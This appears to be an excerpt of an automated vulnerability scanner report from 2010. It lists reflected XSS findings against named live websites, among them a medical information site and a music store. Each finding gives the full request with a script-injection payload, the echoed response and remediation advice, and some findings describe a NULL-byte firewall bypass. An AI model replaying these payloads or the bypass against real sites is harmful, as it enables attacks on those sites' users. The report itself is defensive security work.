This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /?21bba"><script>alert(1)</script>10e5e8898c1=1 HTTP/1.1
Host: www.virtualmedicalcentre.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Tue, 23 Nov 2010 02:45:26 GMT
X-Powered-By: ASP.NET
P3P: CP="OUR"
Set-Cookie: statctr=med; path=/
Set-Cookie: vmcsessionid=%7B7AA442D0%2D86BA%2D42B9%2D9313%2DD056B5BDDDCC%7D; expires=Wed, 24-Nov-2010 13:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSAADQBSS=FAKEAHHBPJLLFCGKCNBGOLAI; path=/
Date: Tue, 23 Nov 2010 02:45:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <link href="/master/c
...[SNIP]...
<meta name="DC.Identifier" scheme="URI" content="http://www.virtualmedicalcentre.com/Default.asp?21bba"><script>alert(1)</script>10e5e8898c1=1" />
...[SNIP]...

2.741. http://www.virtualmedicalcentre.com/calc.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.virtualmedicalcentre.com
Path:   /calc.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26c65"><script>alert(1)</script>e3cde7c40f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /calc.asp?26c65"><script>alert(1)</script>e3cde7c40f=1 HTTP/1.1
Host: www.virtualmedicalcentre.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Tue, 23 Nov 2010 02:45:30 GMT
X-Powered-By: ASP.NET
P3P: CP="OUR"
Set-Cookie: vmcsessionid=%7B9E70432A%2D8A75%2D4CA8%2DAEBF%2D7CF51C2B39ED%7D; expires=Wed, 24-Nov-2010 13:00:00 GMT; path=/
Set-Cookie: statctr=med; path=/
Set-Cookie: ASPSESSIONIDSAADQBSS=ACKEAHHBMPOEGKMKCJKDCLFF; path=/
Date: Tue, 23 Nov 2010 02:45:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <link href="/master/c
...[SNIP]...
<meta name="DC.Identifier" scheme="URI" content="http://www.virtualmedicalcentre.com/calc.asp?26c65"><script>alert(1)</script>e3cde7c40f=1" />
...[SNIP]...

2.742. http://www.virtualmedicalcentre.com/caloriecounter.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.virtualmedicalcentre.com
Path:   /caloriecounter.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 508ba"><script>alert(1)</script>dd880f1b34a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /caloriecounter.asp?508ba"><script>alert(1)</script>dd880f1b34a=1 HTTP/1.1
Host: www.virtualmedicalcentre.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 218665
Content-Type: text/html
Expires: Tue, 23 Nov 2010 02:45:32 GMT
X-Powered-By: ASP.NET
P3P: CP="OUR"
Set-Cookie: vmcsessionid=%7BB8D019A4%2DC242%2D4F41%2DA339%2DA310FFBA94CF%7D; expires=Wed, 24-Nov-2010 13:00:00 GMT; path=/
Set-Cookie: statctr=med; path=/
Set-Cookie: ASPSESSIONIDSAADQBSS=JCKEAHHBDKJLDCECFMHFCBBG; path=/
Date: Tue, 23 Nov 2010 02:45:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <link href="/master/c
...[SNIP]...
<meta name="DC.Identifier" scheme="URI" content="http://www.virtualmedicalcentre.com/caloriecounter.asp?508ba"><script>alert(1)</script>dd880f1b34a=1" />
...[SNIP]...

2.743. http://www.virtualmedicalcentre.com/caloriecounter.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.virtualmedicalcentre.com
Path:   /caloriecounter.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a034a"><script>alert(1)</script>9c84818be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /caloriecounter.asp?a034a"><script>alert(1)</script>9c84818be=1 HTTP/1.1
Host: www.virtualmedicalcentre.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 218657
Content-Type: text/html
Expires: Tue, 23 Nov 2010 02:45:40 GMT
X-Powered-By: ASP.NET
P3P: CP="OUR"
Set-Cookie: vmcsessionid=%7B46FD7DD2%2DCD12%2D40D7%2DA9B6%2D644CFD94BA35%7D; expires=Wed, 24-Nov-2010 13:00:00 GMT; path=/
Set-Cookie: statctr=med; path=/
Set-Cookie: ASPSESSIONIDSAADQBSS=AFKEAHHBIPABPKILPEMGKNKN; path=/
Date: Tue, 23 Nov 2010 02:45:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <link href="/master/c
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.virtualmedicalcentre.com/caloriecounter.asp?a034a"><script>alert(1)</script>9c84818be=1&amp;layout=button_count&amp;show_faces=true&amp;width=90&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" id="fbookLikes" allowTransparency="true">
...[SNIP]...

2.744. http://www.virtualmedicalcentre.com/diseases.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.virtualmedicalcentre.com
Path:   /diseases.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c78e"><script>alert(1)</script>28c8259f7e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /diseases.asp?6c78e"><script>alert(1)</script>28c8259f7e5=1 HTTP/1.1
Host: www.virtualmedicalcentre.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47420
Content-Type: text/html
Expires: Tue, 23 Nov 2010 02:45:29 GMT
X-Powered-By: ASP.NET
P3P: CP="OUR"
Set-Cookie: vmcsessionid=%7B6A969D3A%2DC96B%2D4F94%2DA4A4%2DFAC490625751%7D; expires=Wed, 24-Nov-2010 13:00:00 GMT; path=/
Set-Cookie: statctr=med; path=/
Set-Cookie: ASPSESSIONIDSAADQBSS=LBKEAHHBFPKJIFIILIFKLACG; path=/
Date: Tue, 23 Nov 2010 02:45:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <link href="/master/c
...[SNIP]...
<meta name="DC.Identifier" scheme="URI" content="http://www.virtualmedicalcentre.com/diseases.asp?6c78e"><script>alert(1)</script>28c8259f7e5=1" />
...[SNIP]...

2.745. http://www.virtualmedicalcentre.com/experiences.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.virtualmedicalcentre.com
Path:   /experiences.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40f82"><script>alert(1)</script>ffe1f91aac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /experiences.asp?40f82"><script>alert(1)</script>ffe1f91aac=1 HTTP/1.1
Host: www.virtualmedicalcentre.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 48384
Content-Type: text/html
Expires: Tue, 23 Nov 2010 02:45:42 GMT
X-Powered-By: ASP.NET
P3P: CP="OUR"
Set-Cookie: vmcsessionid=%7BA8BF7E0D%2D7435%2D49C0%2D919C%2DA3781AC4D0C6%7D; expires=Wed, 24-Nov-2010 13:00:00 GMT; path=/
Set-Cookie: statctr=med; path=/
Set-Cookie: ASPSESSIONIDSAADQBSS=EFKEAHHBFICMKJCCMBHDIEBM; path=/
Date: Tue, 23 Nov 2010 02:45:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <link href="/master/c
...[SNIP]...
<meta name="DC.Identifier" scheme="URI" content="http://www.virtualmedicalcentre.com/experiences.asp?40f82"><script>alert(1)</script>ffe1f91aac=1" />
...[SNIP]...

2.746. http://www.virtualmedicalcentre.com/featuredpages.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.virtualmedicalcentre.com
Path:   /featuredpages.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6240f"><script>alert(1)</script>9881b10d42f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /featuredpages.asp?6240f"><script>alert(1)</script>9881b10d42f=1 HTTP/1.1
Host: www.virtualmedicalcentre.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Tue, 23 Nov 2010 02:45:39 GMT
X-Powered-By: ASP.NET
P3P: CP="OUR"
Set-Cookie: vmcsessionid=%7BDAD53E07%2D1DAC%2D49ED%2DA8BD%2DDAC2DA602EC1%7D; expires=Wed, 24-Nov-2010 13:00:00 GMT; path=/
Set-Cookie: statctr=med; path=/
Set-Cookie: ASPSESSIONIDSAADQBSS=KEKEAHHBGFPPOBHDNLAFHAPO; path=/
Date: Tue, 23 Nov 2010 02:45:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <link href="/master/c
...[SNIP]...
<meta name="DC.Identifier" scheme="URI" content="http://www.virtualmedicalcentre.com/featuredpages.asp?6240f"><script>alert(1)</script>9881b10d42f=1" />
...[SNIP]...

2.747. http://www.virtualmedicalcentre.com/healthandlifestyle.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.virtualmedicalcentre.com
Path:   /healthandlifestyle.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b487c"><script>alert(1)</script>0498d7ef857 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /healthandlifestyle.asp?b487c"><script>alert(1)</script>0498d7ef857=1 HTTP/1.1
Host: www.virtualmedicalcentre.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 100129
Content-Type: text/html
Expires: Tue, 23 Nov 2010 02:45:38 GMT
X-Powered-By: ASP.NET
P3P: CP="OUR"
Set-Cookie: vmcsessionid=%7BE2F6BDB5%2D3144%2D47AB%2D8EE2%2D55626B780D89%7D; expires=Wed, 24-Nov-2010 13:00:00 GMT; path=/
Set-Cookie: statctr=med; path=/
Set-Cookie: ASPSESSIONIDSAADQBSS=EEKEAHHBLEMAOKEGCNBJGACI; path=/
Date: Tue, 23 Nov 2010 02:45:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <link href="/master/c
...[SNIP]...
<meta name="DC.Identifier" scheme="URI" content="http://www.virtualmedicalcentre.com/healthandlifestyle.asp?b487c"><script>alert(1)</script>0498d7ef857=1" />
...[SNIP]...

2.748. http://www.virtualmedicalcentre.com/healthinvestigations.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.virtualmedicalcentre.com
Path:   /healthinvestigations.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f75a0"><script>alert(1)</script>5dba5025748 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /healthinvestigations.asp?f75a0"><script>alert(1)</script>5dba5025748=1 HTTP/1.1
Host: www.virtualmedicalcentre.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63120
Content-Type: text/html
Expires: Tue, 23 Nov 2010 02:45:44 GMT
X-Powered-By: ASP.NET
P3P: CP="OUR"
Set-Cookie: vmcsessionid=%7B094FD228%2D1A2B%2D4A77%2DAFFD%2DC18DBB3AA5A3%7D; expires=Wed, 24-Nov-2010 13:00:00 GMT; path=/
Set-Cookie: statctr=med; path=/
Set-Cookie: ASPSESSIONIDSAADQBSS=KFKEAHHBOEPPKNGDJDPEHOAN; path=/
Date: Tue, 23 Nov 2010 02:45:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <link href="/master/c
...[SNIP]...
<meta name="DC.Identifier" scheme="URI" content="http://www.virtualmedicalcentre.com/healthinvestigations.asp?f75a0"><script>alert(1)</script>5dba5025748=1" />
...[SNIP]...

2.749. http://www.virtualmedicalcentre.com/treatments.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.virtualmedicalcentre.com
Path:   /treatments.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3984b"><script>alert(1)</script>4abb88d2a3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /treatments.asp?3984b"><script>alert(1)</script>4abb88d2a3a=1 HTTP/1.1
Host: www.virtualmedicalcentre.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 64530
Content-Type: text/html
Expires: Tue, 23 Nov 2010 02:45:32 GMT
X-Powered-By: ASP.NET
P3P: CP="OUR"
Set-Cookie: vmcsessionid=%7B1874D285%2D1400%2D49FC%2DBCFE%2D447388F02BAA%7D; expires=Wed, 24-Nov-2010 13:00:00 GMT; path=/
Set-Cookie: statctr=med; path=/
Set-Cookie: ASPSESSIONIDSAADQBSS=LCKEAHHBNGIIOLPLPLGMIFAD; path=/
Date: Tue, 23 Nov 2010 02:45:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <link href="/master/c
...[SNIP]...
<meta name="DC.Identifier" scheme="URI" content="http://www.virtualmedicalcentre.com/treatments.asp?3984b"><script>alert(1)</script>4abb88d2a3a=1" />
...[SNIP]...

2.750. http://www.virtualmedicalcentre.com/videopage.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.virtualmedicalcentre.com
Path:   /videopage.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63070"><script>alert(1)</script>49ff8e0efd3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /videopage.asp?63070"><script>alert(1)</script>49ff8e0efd3=1 HTTP/1.1
Host: www.virtualmedicalcentre.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Tue, 23 Nov 2010 02:45:35 GMT
X-Powered-By: ASP.NET
P3P: CP="OUR"
Set-Cookie: vmcsessionid=%7B957648FF%2D89D9%2D4B9C%2D8E66%2DC9A361C42E7A%7D; expires=Wed, 24-Nov-2010 13:00:00 GMT; path=/
Set-Cookie: statctr=med; path=/
Set-Cookie: ASPSESSIONIDSAADQBSS=MDKEAHHBGAKNCONHLMGLABAB; path=/
Date: Tue, 23 Nov 2010 02:45:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <link href="/master/c
...[SNIP]...
<meta name="DC.Identifier" scheme="URI" content="http://www.virtualmedicalcentre.com/videopage.asp?63070"><script>alert(1)</script>49ff8e0efd3=1" />
...[SNIP]...

2.751. http://bigpondmusic.com/mixtapes/create [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /mixtapes/create

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7879</script><script>alert(1)</script>4b7358e3806 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mixtapes/create HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Referer: http://www.google.com/search?hl=en&q=d7879</script><script>alert(1)</script>4b7358e3806

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:15:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 66690


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Login - BigPond Music MP3 Do
...[SNIP]...
<script>
LightboxFrame.onCloseFunction = function() {
window.location.href = 'http://www.google.com/search?hl=en&q=d7879</script><script>alert(1)</script>4b7358e3806';
}
ShowLoginPopup("/SignIn?noclose=true");
</script>
...[SNIP]...

2.752. http://bigpondmusic.com/mixtapes/favourites [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /mixtapes/favourites

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf219</script><script>alert(1)</script>d6ebae307dd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mixtapes/favourites HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Referer: http://www.google.com/search?hl=en&q=cf219</script><script>alert(1)</script>d6ebae307dd

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:15:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 66698


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Login - BigPond Music MP3 Do
...[SNIP]...
<script>
LightboxFrame.onCloseFunction = function() {
window.location.href = 'http://www.google.com/search?hl=en&q=cf219</script><script>alert(1)</script>d6ebae307dd';
}
ShowLoginPopup("/SignIn?noclose=true");
</script>
...[SNIP]...

2.753. http://bigpondmusic.com/mixtapes/my [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /mixtapes/my

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15254</script><script>alert(1)</script>0659f0d212a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mixtapes/my HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Referer: http://www.google.com/search?hl=en&q=15254</script><script>alert(1)</script>0659f0d212a

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:15:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 66682


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Login - BigPond Music MP3 Do
...[SNIP]...
<script>
LightboxFrame.onCloseFunction = function() {
window.location.href = 'http://www.google.com/search?hl=en&q=15254</script><script>alert(1)</script>0659f0d212a';
}
ShowLoginPopup("/SignIn?noclose=true");
</script>
...[SNIP]...

2.754. http://mysite.com/accordion.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mysite.com
Path:   /accordion.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 366fb--><script>alert(1)</script>b8c657fe0f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /accordion.htm HTTP/1.1
Host: mysite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=366fb--><script>alert(1)</script>b8c657fe0f

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 02:50:40 GMT
Server: .V10 Apache
Filter-Revision: 1.217
Keep-Alive: timeout=999999, max=999998
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 13273

<meta http-equiv="Set-Cookie" content="signup_refer=1:%2C:http://www.google.com/search%3Fhl%3Den%26q%3D366fb--%3E%3Cscript%3Ealert%281%29%3C/script%3Eb8c657fe0f; expires=Thu, 23-Dec-2010 02:50:40 GMT;
...[SNIP]...
<!--|10|1290480640|174.122.23.218|http://www.google.com/search?hl=en&q=366fb--><script>alert(1)</script>b8c657fe0f|-->
...[SNIP]...

2.755. http://www.tradingpost.com.au/ [SelectedState cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingpost.com.au
